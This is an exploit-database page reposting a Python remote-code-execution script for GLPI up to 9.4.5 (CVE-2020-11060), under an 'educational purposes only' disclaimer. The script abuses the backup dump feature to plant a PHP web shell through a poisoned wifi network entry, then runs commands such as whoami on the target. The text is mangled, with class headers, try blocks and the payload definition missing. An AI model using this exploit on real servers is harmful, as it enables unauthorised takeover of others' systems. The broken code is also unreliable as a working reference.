Exploits / Vulnerability Discovered : 2023-10-09 |
Type : webapps |
Platform : php
This exploit / vulnerability Glpi gzip(py3) 9.4.5 rce is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/env python3
#Exploit Title: GLPI GZIP(Py3) 9.4.5 - RCE
#Date: 08-30-2021
#Exploit Authors: Brian Peters & n3rada
#Vendor Homepage: https://glpi-project.org/
#Software Link: https://github.com/glpi-project/glpi/releases
#Version: 0.8.5-9.4.5
#Tested on: Exploit ran on Kali 2021. GLPI Ran on Windows 2019
#CVE: 2020-11060
# Built-in imports
import argparse
import random
import re
import string
from datetime import datetime
# Third party library imports
import requests
from lxml import html
def __init__(self, url: str, user: str, password: str, platform: str):
Initialize the GlpiBrowser with required attributes.
url (str): The URL of the target GLPI instance.
user (str): The username for authentication.
password (str): The password for authentication.
platform (str): The platform of the target (either 'windows' or 'unix').
self.__url = url
self.__user = user
self.__password = password
self.accessible_directory = "pics"
if "win" in platform.lower():
self.__platform = "windows"
self.__platform = "unix"
# Dunders
def __repr__(self) -> str:
"""Return a machine-readable representation of the browser instance."""
return f"<GlpiBrowser(url={self.__url!r}, user={self.__user!r}), password={self.__password!r}, plateform={self.__platform!r}>"
def __str__(self) -> str:
"""Return a human-readable representation of the browser instance."""
return f"GLPI Browser targeting {self.__url!r} ({self.__platform!r}) with following credentials: {self.__user!r}:{self.__password!r}."
# Public methods
def is_alive(self) -> bool:
Check if the target GLPI instance is alive and responding.
bool: True if the GLPI instance is up and responding, otherwise False.
self.__session.get(url=self.__url, timeout=3)
except Exception as error:
print(f"[-] Impossible to reach the target.")
print(f"[x] Root cause: {error}")
return False
print(f"[+] Target is up and responding.")
return True
def login(self) -> bool:
Attempt to login to the GLPI instance with provided credentials.
for rawlink in set(
for link in webpage.xpath("//a/@href")
if "wifinetwork.form.php?id=" in link
network_id = rawlink.split("=")[-1]
print(f"\tDeleting network id: {network_id}")
padding (str): _description_
datemod (str): _description_
print("[+] Modifying network")
for rawlink in set(
for link in html.fromstring(
if "wifinetwork.form.php?id=" in link
# edit the network name and essid
"entities_id": "0",
"is_recursive": "0",
"name": "PoC",
"comment": PAYLOAD,
"essid": f"RCE{padding}",
"mode": "ad-hoc",
"update": "Save",
"id": rawlink.split("=")[-1],
"_glpi_csrf_token": self.__extract_csrf(
"_read_date_mod": datemod,
print(f"\tNew ESSID: RCE{padding}")
def create_dump(self, wifi_table_offset: str = None):
Initiates a dump request to the server.
wifi_table_offset (str, optional): The offset for the 'wifi_networks' table. Defaults to '310'.
Adjust the offset number to match the table number for wifi_networks.
This can be found by downloading a SQL dump and running:
zgrep -n "CREATE TABLE" glpi-backup-*.sql.gz | grep -n wifinetworks
dump_target = f"{self.path}{self.__shell_name}"
print(f"[*] Dumping the database remotely at: {dump_target}")
f"{self.__url}/front/backup.php?dump=dump&offsettable={wifi_table_offset or '310'}&fichier={dump_target}"
self.__shell_name = (
"".join(random.choice(string.ascii_letters) for _ in range(8)) + ".php"
print(f"[+] Current shellname: {self.__shell_name}")
if self.__shell_check():
tick += 1
print("-" * 66)
print(f"[+] RCE found after {tick} trials!")
# Private methods
def __extract_csrf(self, html: str):
"""Extract CSRF token from the provided HTML content."""
return re.search(
pattern=r'name="_glpi_csrf_token" value="([a-f0-9]{32})"', string=html
def __shell_check(self) -> bool:
"""Check if the uploaded shell is active and responding correctly."""
r = self.__session.get(
params={"0": "echo HERE"},
shell_size = len(r.content)
print(f"[+] Shell size: {shell_size!s}")
if shell_size < 50:
print("[x] Too small, there is a problem with the choosen offset.")
return False
return b"HERE" in r.content
# Properties
def path(self):
"""With this property, every time you access self.path, it will dynamically generate and return the path string based on the current value of self.accessible_directory. This way, it will always be a "direct reference" to the value of self.accessible_directory."""
if "win" in self.__platform.lower():
return f"C:\\xampp\\htdocs\\{self.accessible_directory}\\"
return f"/var/www/html/glpi/{self.accessible_directory}/"
def shell_path(self) -> str:
"""Generate the complete path to the uploaded shell."""
return f"{self.__url}/{self.accessible_directory}/{self.__shell_name}"
def execute(
url: str,
command: str,
timeout: float = None,
) -> str:
Executes a given command on a remote server through a web shell.
This function assumes a web shell has been previously uploaded to the target
server and sends a request to execute the provided command. It uses a unique
delimiter ("HoH") to ensure that the command output can be parsed and
returned without any additional data.
url (str): The URL where the web shell is located on the target server.
command (str): The command to be executed on the target server.
timeout (float, optional): Maximum time, in seconds, for the request
to the server. Defaults to None, meaning no timeout.
str: The output of the executed command. Returns None if the URL or
command is not provided.
if url is None or command is None:
# Use regex to find the content between "HoH" delimiters
if match := re.search(
pattern=r"HoH(.*?)HoH", string=response.text, flags=re.DOTALL
return match.group(1).strip()
def main() -> None:
parser = argparse.ArgumentParser()
parser.add_argument("--url", help="Target URL.", required=True)
parser.add_argument("--user", help="Username.", default=None)
parser.add_argument("--password", help="Password.", default=None)
parser.add_argument("--platform", help="Target OS (windows/unix).", default=None)
"--offset", help="Offset for table wifi_networks.", default=None
help="Accessible directory on the target.",
) # "sound" as default directory
parser.add_argument("--command", help="Command to execute via RCE.", default=None)
options = parser.parse_args()
if options.command:
# We assume the given URL is the shell path if a command is provided.
response = execute(url=options.url, command=options.command, timeout=5)
except TimeoutError:
print(f"[x] Timeout received form target. Maybe your command failed.")
print(f"[*] Response received from {options.url!r}:")
f"[+] You can execute command remotely as: {execute(url=target.shell_path, command='whoami').strip()}@{execute(url=target.shell_path, command='hostname').strip()}"
print("[+] Run this tool again with the desired command to inject:")
f"\tpython3 CVE-2020-11060.py --url '{target.shell_path}' --command 'desired_command_here'"